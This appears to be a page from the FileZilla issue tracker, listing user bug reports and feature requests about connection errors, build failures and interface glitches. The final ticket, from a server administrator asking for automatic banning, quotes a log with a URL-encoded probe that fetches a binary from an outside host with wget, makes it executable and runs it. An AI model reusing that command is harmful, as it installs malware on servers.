Using Safari 11.0 running on macOS 10.13 when attempting to upload files to my site I get a 530 validation error for my p/w. This did not happen previously with version 3.27.1 nor does it currently so I am not updating until this bug is fixed. |
|||||
#11412 | "552 Disk full - please upload later" when transferring files. | Other | normal | FileZilla Client | rejected | |
Description |
This is the error I get when trying to edit/transfer files for my website in the FileZilla client: https://imgur.com/a/LKyOY I read about this on a forum and people said I should submit a ticket for this error. I'm not sure what the error means or how to fix it so that's why I'm creating this ticket. If you need it, here's the server address: 31.170.165.111 I hope you can fix this as soon as possible. |
|||||
#11413 | FileZilla v3.28.0 for Ubuntu Linux will not start: Error loading shared library. | Bug report | normal | FileZilla Client | rejected | |
Description |
Downloaded: FileZilla_3.28.0_x86_64-linux-gnu.tar.bz2 Error: ./filezilla: error while loading shared libraries: libpng16.so.16: cannot open shared object file: No such file or directory v3.27.x does not have this problem, so reverted back. Please fix! |
|||||
#11414 | Vs. 3.28.0 does´n connect in SFTP to Google Claud platform | Bug report | normal | FileZilla Client | rejected | |
Description |
Trying to connect to the Google Cloud platform (through the Bitnami platform) I get the following response: Estado: Conectando a 35.196.225.5:6010... Respuesta: fzSftp started, protocol_version=6 Comando: keyfile "D:\IRC WebPage\Server Keys Bitnami\bitnami-google-mystic-subject-174905.ppk" Comando: open "bitnami@35.196.225.5" 6010 Error: Network error: Connection timed out Error: No se pudo conectar al servidor Estado: Esperando para reintentar... Estado: Conectando a 35.196.225.5:6010... Respuesta: fzSftp started, protocol_version=6 Comando: keyfile "D:\IRC WebPage\Server Keys Bitnami\bitnami-google-mystic-subject-174905.ppk" Comando: open "bitnami@35.196.225.5" 6010 Error: Network error: Connection timed out Error: No se pudo conectar al servidor Estado: Esperando para reintentar... Estado: Conectando a 35.196.225.5:6010... Respuesta: fzSftp started, protocol_version=6 Comando: keyfile "D:\IRC WebPage\Server Keys Bitnami\bitnami-google-mystic-subject-174905.ppk" Comando: open "bitnami@35.196.225.5" 6010 Error: Network error: Connection timed out Error: No se pudo conectar al servidor Please help Me. What could be the cause of this error? |
|||||
#11415 | old putty license doesn't work with the new fz pro license | Bug report | normal | FileZilla Client | worksforme | |
Description |
You cannot sell a GPL'd product. read the license. you cannot do it. you can sell support. you can I think even sell it on media for cost of media+shipping. and if you took donations before, you cannot take payment for pro now unless the org goes down and comes back up. talk to your accountant. |
|||||
#11416 | port number gets lost clicking OK or connect | Bug report | normal | FileZilla Client | rejected | |
Description |
I put in 990 and it gets lost. using ftp require implicit, normal. |
|||||
#11419 | Constant message to update | Other | normal | FileZilla Client | worksforme | |
Description |
Currently running the version below. When opening the program it states a new version is available. I install the new version, reopen and it states a new version is available. This is continuous. Even though the info says the version is current when I go on your site to get help it tells me I am running an outdated version. Is there a way can fix this repetitive issue without losing all my connections in Site Manager or do I have to totally uninstall and reinstall? Please let me know if there is any additional info you may need. Thx for your help! Sam Gudgel FileZilla Client Version: 3.26.2 Build information:
Linked against:
Operating system:
|
|||||
#11423 | Allow users to choose where sitemanager.xml is stored | Feature request | normal | FileZilla Client | rejected | |
Description |
Like a lot of users I need to sync filezilla across multiple computers, this often involves complex or time consuming procedures that don't always work reliably. With this in mind please simply allow users to choose the location of sitemanager.xml in settings. |
|||||
#11424 | space at the beginning of a directory name causes problems | Bug report | normal | FileZilla Client | worksforme | |
Description |
Mind-numbling stupid, but on a linux system I can create a directory using ftp ftp.mkdir('xxx/ xxxx') enter directory 'xxx', and list the contents (not using filezilla), I get ' xxxx'. I can add a directory 'xxxx', and place a file in directory 'xxxx' filezilla shows two 'xxxx' directories, and if I open either directory then the file in directory 'xxxx' is displayed. I can remove directory 'xxxx', but filezilla still shows that it exists, and it cannot be removed. if I rename the directory ftp.rename('xxx\ xxxx','xxx\xxxxx'); I can remove it using filezilla. As I said Mind-numbingly stupid! |
|||||
#11427 | Unable to connect to FTP server | Bug report | normal | Other | rejected | |
Description |
Hi I am unable to connect to FTP server for my website cintu-sa.com. Please find attached a screenshot of the same for your reference. Kindly let me know in case of any help. Thanks & Regards, Anish Sah |
|||||
#11428 | FileZilla Pro: S3 connect , not to a amazon host | Bug report | normal | FileZilla Client | fixed | |
Description |
Enter in host name, user, password. The credentials are still being sent to Amazon and not the host name I entered. Filezilla Pro version 3.28.0 Windows 7 Pro. |
|||||
#11431 | Filezilla 3.28 does NOT work on Debian 9 Mate. | Bug report | normal | FileZilla Client | invalid | |
Description |
Hello. I installed Debian 9 only to test if Filezilla 3.28 works. It does NOT work. It still shows only a list of shared library files. Could someone fix Filezilla or provide better solution for Filezilla usage, etc.? Thank you. <removed privacy nightmare> |
|||||
#11432 | File uploading error | Bug report | normal | FileZilla Client | rejected | |
Description |
Status: Resolving address of ftp.navajyoti.net Status: Connecting to 148.66.152.202:21... Status: Connection established, waiting for welcome message... Status: Initializing TLS... Status: Verifying certificate... Status: TLS connection established. Status: Logged in Status: Starting upload of C:\Users\vivek\AppData\Local\Temp\fz3temp-2\user.php Command: CWD /search Response: 250 OK. Current directory is /search Command: TYPE A Response: 200 TYPE is now ASCII Command: PASV Response: 227 Entering Passive Mode (148,66,152,202,197,170) Command: STOR user.php Response: 552 Disk full - please upload later Error: Critical file transfer error |
|||||
#11433 | Freezes the whole OS when resizing the top panel | Bug report | normal | FileZilla Client | rejected | |
Description |
Steps to reproduce:
Expected: obvious Observed: the mouse cursor remains in the form of an up-down double arrow (resize icon), even if you move the cursor out of FileZilla's window. Nothing responds to clicks, neither in FileZilla nor IN THE WHOLE OS. All mouse interaction is frozen. You cannot even close filezilla. The only way out is to open a terminal via a keyboard shortcut and kill Filezilla from the command line!! |
|||||
#11434 | cannot connect to server | Bug report | normal | FileZilla Client | rejected | |
Description |
I cannot connect to a server of use linux sometimes, but sometimes I can. The failture frequency is high and I can't stick it. Using ssh in terminal and Transmit can connect to the same server and never failed. The following are the information (some are in Chinese and I translate to English). 状态: 正在连接 159.226.158.130...(status:connnecting to 159.226.158.130) 响应: fzSftp started, protocol_version=8 命令: open "jzheng@159.226.158.130" 22 错误: 20 秒后无活动,连接超时(error:No activity after 20 seconds, connection timeout) 错误: 无法连接到服务器(error: cannot connect to server) 状态: 正在等待重试...(status:Waiting for retry) 状态: 正在连接 159.226.158.130... 响应: fzSftp started, protocol_version=8 命令: open "jzheng@159.226.158.130" 22 错误: 20 秒后无活动,连接超时 错误: 无法连接到服务器 状态: 已从服务器断开 |
|||||
#11436 | ../src/gtk/toplevel.cpp(988): assert "m_widget" failed in Show(): invalid frame | Bug report | normal | FileZilla Client | fixed | |
Description |
On startup: ASSERT INFO: ../src/gtk/toplevel.cpp(988): assert "m_widget" failed in Show(): invalid frame BACKTRACE: [1] wxTopLevelWindowGTK::Show(bool) [2] wxTopLevelWindowBase::Destroy() [3] wxEvtHandler::ProcessEventIfMatchesId(wxEventTableEntryBase const&, wxEvtHandler*, wxEvent&) [4] wxEventHashTable::HandleEvent(wxEvent&, wxEvtHandler*) [5] wxEvtHandler::TryHereOnly(wxEvent&) [6] wxEvtHandler::ProcessEventLocally(wxEvent&) [7] wxEvtHandler::ProcessEvent(wxEvent&) [8] wxEvtHandler::SafelyProcessEvent(wxEvent&) [9] wxTimerImpl::SendEvent() [10] g_main_context_dispatch [11] g_main_loop_run [12] gtk_main [13] wxGUIEventLoop::DoRun() [14] wxEventLoopBase::Run() [15] wxAppConsoleBase::MainLoop() [16] wxEntry(int&, wchar_t**) [17] __libc_start_main FileZilla 3.28.0 (Debian Sid) |
|||||
#11441 | FileZilla 3.28.0 does not build on Mac OS X <= 10.11 (El Capitan) | Bug report | normal | FileZilla Client | fixed | |
Description |
For example, on El Capitan, building FileZilla 3.28.0 via MacPorts failed: /opt/local/bin/clang-mp-4.0 -DHAVE_CONFIG_H -I. -I../../src/include -I./../include -I/opt/local/Library/Frameworks/wxWidgets.framework/Versions/wxWidgets/3.0/lib/wx/include/osx_cocoa-unicode-3.0 -I/opt/local/Library/Frameworks/wxWidgets.framework/Versions/wxWidgets/3.0/include/wx-3.0 -D_FILE_OFFSET_BITS=64 -DWXUSINGDLL -D__WXMAC__ -D__WXOSX__ -D__WXOSX_COCOA__ -I/opt/local/include -fpch-preprocess -pipe -Os -arch x86_64 -MT filezilla-power_management_osx.o -MD -MP -MF .deps/filezilla-power_management_osx.Tpo -c -o filezilla-power_management_osx.o `test -f 'power_management_osx.m' || echo './'`power_management_osx.m file_utils_osx.m:11:22: error: property 'path' cannot be found in forward class object 'NSURL' path = strdup(url.path.UTF8String); ~~~ ^ /System/Library/Frameworks/CoreFoundation.framework/Headers/CFBase.h:251:8: note: forward declaration of class here @class NSURL; ^ 1 error generated. The full build log can be found at https://build.macports.org/builders/ports-10.11_x86_64-builder/builds/40551/steps/install-port/logs/stdio |
|||||
#11446 | Error when starting FileZilla | Bug report | normal | FileZilla Client | worksforme | |
Description |
hey all, I keep getting this error when I launch my app, Ive tried deleting everything to do with FZ but still get this error. |
|||||
#11447 | Apply remote directory filters remotely (on read) | Feature request | normal | FileZilla Client | rejected | |
Description |
It appears that file and directory filters placed on the remote directory are applied locally, after all files are read from the remote directory. For the sake of performance with certain operations on large directories, it would be helpful to be able to apply these filters remotely. To be more precise, it appears that current functionality executes an "ls" command, and then filters the results. It would be nice to have a way of executing a command like "ls filter*" or "ls *filter". I'd be happy to help with testing this modification. Might even be able to assist with implementation. |
|||||
#11450 | Filezilla update flagged as randsomeware | Bug report | normal | FileZilla Client | rejected | |
Description |
my trend micro security software flagged the filezilla update as randsomeware. Was filezilla hacked or what? Screen snip attached |
|||||
#11460 | Sort Order for Transfer Queue | Bug report | normal | FileZilla Client | duplicate | |
Description |
Clicking the column headings in the Transfer Queue does not resort the files listed in the transfer queue. Files always remain in the order added. I want to be able to resort the list to group together files that I've prioritized, to sort by size so that I can prioritize large files over smaller files, etc. I've been using FileZilla for years, and have yet to see this work. The column headings are clickable, but clicking seems to produce no results. |
|||||
#11461 | Filezilla crashes when (dis)connecting external monitors | Bug report | normal | FileZilla Client | fixed | |
Description |
When you attach or detach external monitors, FileZilla client intermittently crashes - report attached. |
|||||
#11462 | Changelog shows up even though nobody cares | Bug report | normal | FileZilla Client | rejected | |
Description |
Every time you start filezilla after it has been updated in some inexplicable minor way nobody cares about, it pops up with a change log that you have to click OK on. Really pointless. Yes I know this doesn't belong here. It just annoys me enough to be worth wasting your time deleting this. |
|||||
#11467 | Auto Connect | Bug report | normal | FileZilla Client | worksforme | |
Description |
I am not able to auto connect to a site. In the past when I opened FileZilla, it would automatically connect to a site. But now it doesn't and I have to go into the Site Manager to connect. |
|||||
#11468 | Lost first Record | Bug report | normal | FileZilla Client | rejected | |
Description |
I have fixes for a mainframe system that is downloaded to a windows machine. This needs to be transferred to a mainframe in binary format. I had two files. One works just fine. The other one looses the first record. This is actually a key to the future processing of the record. This fix was sent to another user who used Bluezone transfer which worked fine. |
|||||
#11469 | executable alias. is it possible? | Feature request | normal | FileZilla Server | rejected | |
Description | ||||||
#11473 | FileZilla_3.29.0_macosx-x86.app.tar.bz2 fails to install | Bug report | normal | FileZilla Client | worksforme | |
Description |
FileZilla 3.29 update failed to install correctly. Mac OS X 10.11.6, MacBook Pro, Intel Core i7 processor. Downloaded FileZilla_3.29.0_macosx-x86.app.tar.bz2 to my Downloads directory Unpacked the bz2 file in place to FileZilla_3.29.0_macosx-x86.app.tar using WinZip 6.0.3507 Unpacked the tar file in place by double-clicking on it in Finder. Moved FileZilla.app to the Applications directory, replacing my existing version of FileZilla, 3.27. Tried to open FileZilla 3.29 app by double-clicking on it in Finder. Immediately get this message from Finder: "The application “FileZilla.app” can’t be opened." Restored my 3.27 version from TimeMachine; works fine. Repeated the above steps; same result. Unpacked the app again onto the Desktop. Same result. MD5(FileZilla_3.27.1_macosx-x86.app.tar.bz2)= a327ae27021328f93bfef5a2b74706f4 MD5(FileZilla_3.27.1_macosx-x86.app.tar)= 507c2ad053d404bbfa2b3dd1d8de1792 I didn't find the download digest on the FileZilla downloads page. Suggest putting it there so users can check that the file was not corrupted. I've used FileZilla for years, love it. Updated frequently, using same install procedure. Not a problem before. Advice? Thank you! |
|||||
#11475 | Cached password can't be corrected (see also #1240 and #4491) | Bug report | normal | FileZilla Client | duplicate | |
Description |
to quote #1240,
This is still happening in 3.29.0 even though response to issue #4491 says it would be fixed in next version. This happens when save password for this session option is selected upon entering password on a site where login is set to "Ask for password." |
|||||
#11476 | select all | Bug report | normal | FileZilla Client | rejected | |
Description |
in the bottom right files box if there is only 5 items and you try to do the usual windows click box select, the mouse shoots off the screen and doesnt work. |
|||||
#11478 | [PATCH] Use reverse-DNS style AppStream ID | Patch | normal | FileZilla Client | rejected | |
Description |
AppStream IDs are required to use the reverse-DNS style, e.g. "org.filezilla-project.Filezilla". I'm attaching a patch that accomplishes that. Relevant section of the AppStream spec: https://www.freedesktop.org/software/appstream/docs/chap-Metadata.html#sect-Metadata-GenericComponent On a practical note, having a non-rDNS-style AppStream ID is problematic for users of GNOME Software and KDE Discover (and other similar software center apps) when Filezilla is available from their distros' packages as well as Flathub--which correctly enforces rDNS-style AppStream IDs. If the AppStream IDs don't match between these sources, then the software centers can't de-duplicate them and users confusingly see two entries when they search for FileZilla. Standardizing on the rDNS-style ID eliminates this problem (in addition to conforming to the spec). |
|||||
#11479 | 550/ Dropbox error: No such file or directory | Bug report | normal | FileZilla Server | rejected | |
Description |
I am unable to connect to the dropbox to sumbit our claims. It looks like the 'dropbox' option was deleted from our server; however, it is still appearing as an option. |
|||||
#11481 | SiteManager freezes some mouse functionality in Opera | Bug report | normal | FileZilla Client | rejected | |
Description |
When opening FZ, all functionality is still fine. Soon as I click on "File" then "SiteManager" I loose my scroll wheel and right click functionality on all opera webpages. This issue does not influence Firefox nor OpenOffice. I still have left click function in opera main menu and tool bar. Only inside webpages I can only scroll with the up/down arrows on the keyboard. When I left click/right click inside a form or hover over a dropdown, nothing happens. (Could not fill out this ticket in Opera - had to open Firefox.) To get rid of the problem, I have to restart Opera while FZ is still open. I can then work in FileZilla and Opera - no problem. As soon as I disconnect from the server in FZ and go into "File" "Site Manager" again, the same thing happens. Opera mouse functions disappear on webpages. Feel free to contact me for any other info. Kind regards McGuyver. |
|||||
#11483 | Highlight Selections With Cursor Broken | Bug report | normal | FileZilla Client | rejected | |
Description |
After installing newest release, 3.30.0-rc1, when I drag the cursor to select file names in order to drag and transfer them to the remote site, the highlight does not work properly, sending the cursor jumping to different parts of the screen. |
|||||
#11484 | Build failure on Mac OS X <= 10.6: use of undeclared identifier 'O_CLOEXEC' | Bug report | normal | libfilezilla | wontfix | |
Description |
Building libfilezilla fails on Mac OS X 10.6 and earlier: file.cpp:143:14: error: use of undeclared identifier 'O_CLOEXEC' int flags = O_CLOEXEC; ^ 1 error generated.
Looks like this problem has been present since the libfilezilla code was originally checked in in r7050. |
|||||
#11486 | FileZilla could not download the new version | Bug report | normal | FileZilla Client | rejected | |
Description |
After open FileZilla, it detects a new version (3.29.0 (2017-11-06)) but can't download it. Here is the installed version: FileZilla Client Version: 3.28.0 Build information:
Linked against:
Operating system:
|
|||||
#11487 | 38,000 files directory lisiting fails | Bug report | normal | FileZilla Client | rejected | |
Description |
Sorry, I have a lot of files on my server in one folder (over 38K files). Can this be handled with a bug fix? Client is running on Win 7 64 bit, also other OS are affected (but some aren't). The log message is: Status: Retrieving directory listing of "/userdata/penepma12/penfluor/Binary (3600 sec)"... Command: CWD /userdata/penepma12/penfluor/Binary (3600 sec) Response: 250 CWD successful. "/userdata/penepma12/penfluor/Binary (3600 sec)" is current directory. Command: PWD Response: 257 "/userdata/penepma12/penfluor/Binary (3600 sec)" is current directory. Command: PASV Response: 227 Entering Passive Mode (128,223,10,53,5,182) Command: MLSD Response: 150 Connection accepted Error: GnuTLS error -9 in gnutls_record_recv: A TLS packet with unexpected length was received. Status: Server did not properly shut down TLS connection Error: Could not read from transfer socket: ECONNABORTED - Connection aborted Response: 226 Transfer OK Error: Failed to retrieve directory listing |
|||||
#11489 | Mouse drag in file browser slides the whole view sideways | Bug report | normal | FileZilla Client | duplicate | |
Description |
FileZilla client v 3.30.0 OS: Windows 10 Pro
The last couple versions of had this bug, though not in versions past. In the file browser pane (either local or remote), doing any sort of mouse dragging (ie to select multiple files, etc.) suddenly slams the view all the way to the right of the pane. This only happens if there is a horizontal scroll bar present; if there's no scroll bar there's no issue, you can lasso documents fine. |
|||||
#11493 | The remote file listview freezes if a file-rename gets ended by a mouse click rather than enter key | Bug report | normal | FileZilla Client | fixed | |
Description |
|
|||||
#11495 | APPCRASH when uploading images | Bug report | normal | FileZilla Client | outdated | |
Description |
Hello, Thank you for the great software. Lately I experience the following windows crash anytime I try to upload a list of images from my PC to the server: Problem signature:
Read our privacy statement online: If the online privacy statement is not available, please read our privacy statement offline:
This happens after a couple of images have been successfully uploaded I have been using Filezilla for ages and never experienced the same issue. Thank you |
|||||
#11499 | Refresh should use Ctrl+R | Bug report | normal | FileZilla Client | rejected | |
Description |
To refresh the client window (of files and dirs), the program currently supports only the F5 command key, but those F1-F12 keys are gradually being phased out by laptop makers. In most apps nowadays, the new standard is Ctrl+R to refresh a window. FileZilla should allow the use of Ctrl+R to refresh the window. |
|||||
#11500 | Remote folder file selection on second screen buggy | Bug report | normal | FileZilla Client | duplicate | |
Description |
If you want to select files on the remote folder and press down mouse button and move the mouse up or down to select files, the mouse cursor jumps to the very bottom right edge of the screen. This bug only appears if I use FileZilla on a second screen and only in the remote file list. Also see this screen record: https://streamable.com/s/phttz/wnwplg Version: 3.30.0 Build information:
Linked against:
Operating system:
|
|||||
#11502 | Download fails on all files except very small ones | Bug report | normal | FileZilla Client | worksforme | |
Description |
I am using FileZilla 3.30.0 in order to connect from my Windows 10 Home 64 bit PC to my office server (Windows 2003 server) through a VPN internet connection. I am able to upload (from my PC to the server) files of any size, but cannot download files larger than a couple of Kbytes: in the example below, the transfer fails after 2,920 bytes, restarts the loading (where it stopped, I imagine), fails again after the subsequent 2,920 bytes), and so on, until in the end it aborts the connection before having managed to load the whole file. I hadn't used this connection in order to download contents for quite a while, but am pretty sure it worked well with my previous home PC (which was running Windows 7). This is a new machine, to which I copied the FileZilla parameters. |
|||||
#11503 | Sélection à la souris des fichiers completés dans zone Transferts Réussis, incorrecte | Bug report | normal | FileZilla Client | duplicate | |
Description |
bonjour, Dans la zone des fichiers complétés, si je sélectionne à la souris les fichiers en partant du haut à gauche voulant aller vers le bas à droite, le curseur sélectionne n'importe quoi et se place en bas à droite, la sélection ne se fait pas. Ce n'est pas visible dans une autre zone. Merci FileZilla Client Version: 3.30.0 Build information:
Linked against:
Operating system:
|
|||||
#11504 | 550 No such file or directory / Error: Failed to retrieve directory listing | Bug report | normal | FileZilla Client | rejected | |
Description |
When accessing the contents of my FritzBox 7490 there is one directory which is listed in Filezilla but cannot be accessed. Whatever I try for that one specific directory (rename, change rights, enter) fails with message "550: No such file or directory". 2018-01-30 08:26:20 9404 1 Command: LIST 2018-01-30 08:26:20 9404 1 Response: 150 Opening BINARY mode data connection for '/bin/ls -lgA'. 2018-01-30 08:26:21 9404 1 Response: 226 Transfer complete. 2018-01-30 08:26:21 9404 1 Listing: drwxrwxr-x 1 ftp ftp 2048 Jun 21 2013 Bilder 2018-01-30 08:26:21 9404 1 Listing: drwxrwxr-x 1 ftp ftp 2048 Sep 6 2017 Dokumente 2018-01-30 08:26:21 9404 1 Listing: drwxrwxrwx 1 ftp ftp 2048 Oct 22 2015 FRITZ 2018-01-30 08:26:21 9404 1 Listing: drwxrwxr-x 1 ftp ftp 2048 Jun 20 2017 Musik 2018-01-30 08:26:21 9404 1 Listing: drwxrwxr-x 1 ftp ftp 2048 Jun 21 2013 Videos 2018-01-30 08:26:21 9404 1 Listing: drwxrwxrwx 1 ftp ftp 2048 Jan 30 08:00 awo_haan_dbbackup 2018-01-30 08:26:21 9404 1 Listing: drwxrwxrwx 1 ftp ftp 2048 Sep 9 2017 lvq 2018-01-30 08:26:21 9404 1 Status: Directory listing of "/" successful 2018-01-30 08:26:24 9404 1 Status: Retrieving directory listing of "/awo_haan_dbbackup"... 2018-01-30 08:26:24 9404 1 Command: CWD awo_haan_dbbackup 2018-01-30 08:26:24 9404 1 Response: 550 awo_haan_dbbackup: No such file or directory. 2018-01-30 08:26:24 9404 1 Error: Failed to retrieve directory listing All other directories are not showing this behavior. I crosschecked with other ftp client (Filezilla, see attached screenshot), here, everything works out fine. The directory's name is "awo_haan_dbbackup", it contains 110 files using 285 MB of space. Attached please find complete debug log. |
|||||
#11505 | Impossible to change directory if it contains trailing space(s) | Bug report | normal | FileZilla Client | duplicate | |
Description |
Hi there, I think it's a bug: it's impossible to change directory by clicking the folder if it contains one or more trailing spaces. Thank you. |
|||||
#11506 | filezilla server can't stop services | Bug report | normal | FileZilla Server | fixed | |
Description |
filezilla server can't stop services. wait for hash threading "infinite waitting dead lock" ================================== see hash_thread.cpp void CHashThread::Loop() {
} ================================== temp code: void CHashThread::Loop() {
} |
|||||
#11507 | Skipped File Transfers in the Transfer Queue window. | Feature request | normal | FileZilla Client | duplicate | |
Description |
The "successful transfers" tab in the "transfer queue" window includes the skipped file transfers along with the actual upload/download transfers in a single list. So you can't tell which files were actually transferred and which were skipped. Could you please consider adding a separate "skipped" tab? Or maybe adding a "status" column in the "successful transfers" tab, with the appropriate indication "transferred/skipped"? Thank you in advance and please excuse my poor English. |
|||||
#11510 | Incorrect cursor behavior when selecting files | Bug report | normal | FileZilla Client | duplicate | |
Description |
When selecting files in directory tree with horizontal scroll, the cursor sharply moves to the corner of the screen or selection moves very slowly. When there is no horizontal scroll - everything works fine. This bug appeared in recent versions. |
|||||
#11511 | Digital Ocean S3 | Other | normal | FileZilla Client | worksforme | |
Description |
I have an account inside the Digital Ocean Spaces, which uses the S3 technology, the same as the amazon, I do all the configuration of the Host, User and password, it does of the process, but points to the amazom server, even when I type the url of digital ocen, follows images. is it possible for him to follow the path to Digital Ocean or do you put the protocol there? Thank you |
|||||
#11512 | Compatibility between FileZilla server and TotalCommander as client | Bug report | normal | FileZilla Server | rejected | |
Description |
There is a problem that present for a long time - FTP client built in TotalCommander have bad compatibility with current FileZilla server - it may sometimes show empty folders that are full of files or drop filetransfer after random file. It loks like appeared from some FileZilla server update near 2 years ago. I'm not sure what is source of a problem, FileZilla server log not helpful in this case too. Also I'm not even sure that problem is on TotalCommander side or FileZilla server side (but official FileZilla client have no problems with same server). What I know - it not depends on connection way (SSL or normal, passive or not), but depends on client side - there is more prolems when client is an old slow PC and/or slow internet connection. From server side - there is more chance for interrupted transfer, if try to download a folder with a lot of small files (real example - saved webpages with all their resources/images/scripts) Closing ticket as it must be a client-side issue, there is nothing in the server log that matches the described symptoms. |
|||||
#11514 | Errore traduzione in Aggiunta ricorsiva file alla coda | Bug report | normal | FileZilla Client | fixed | |
Description |
C'è una "i" in più.. Elaborato xxx file iin xxx cartelle |
|||||
#11516 | Increase in remote attacks against FileZilla FTP Server - Can better protection be implemented | Feature request | normal | FileZilla Server | rejected | |
Description |
I've seen an increase in attacks against FileZilla FTP Server installs I'm administering. While it looks like these attacks are unsuccessful, they are getting annoying, and I'd like to ensure my installs are as protected as possible. They are on high ports, but security by obscurity is not real security, only a deterrent until port scanners come along and information is passed around. (002024)2/7/2018 8:12:33 AM - (not logged in) (123.249.XXX.XXX)> Connected on port [serverport], sending welcome message... (002024)2/7/2018 8:12:33 AM - (not logged in) (123.249.XXX.XXX)> GET / HTTP/1.1 (002059)2/12/2018 20:34:06 PM - (not logged in) (104.207.xxx.xxx)> GET /shell?%77%67%65%74%20%2D%50%20%2F%74%6D%70%20%68%74%74%70%3A%2F%2F%68%66%73%2E%6D%68%61%63%6B%65%72%2E%63%63%3A%39%32%37%38%2F%6C%69%6E%75%78%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D%3B%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D HTTP/1.1 (002059)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Referer: http://filezilla.server.ip.address:port/shell?%77%67%65%74%20%2D%50%20%2F%74%6D%70%20%68%74%74%70%3A%2F%2F%68%66%73%2E%6D%68%61%63%6B%65%72%2E%63%63%3A%39%32%37%38%2F%6C%69%6E%75%78%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D%3B%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D (002060)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Accept-Language: zh-cn (002060)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Host: filezilla.server.ip.address:port Manual entry and maintenance of an IP Blacklist is cumbersome and time consuming, as indicated here - https://trac.filezilla-project.org/ticket/8855 I would like to see an option to automatically implement kick and ban length already configured in settings for specific commands coming in that match attack patterns, even if I have to maintain my own list of patterns. More complete logs can also be provided upon request, as there are a lot more entries with each attempt mucking up my logs and console. |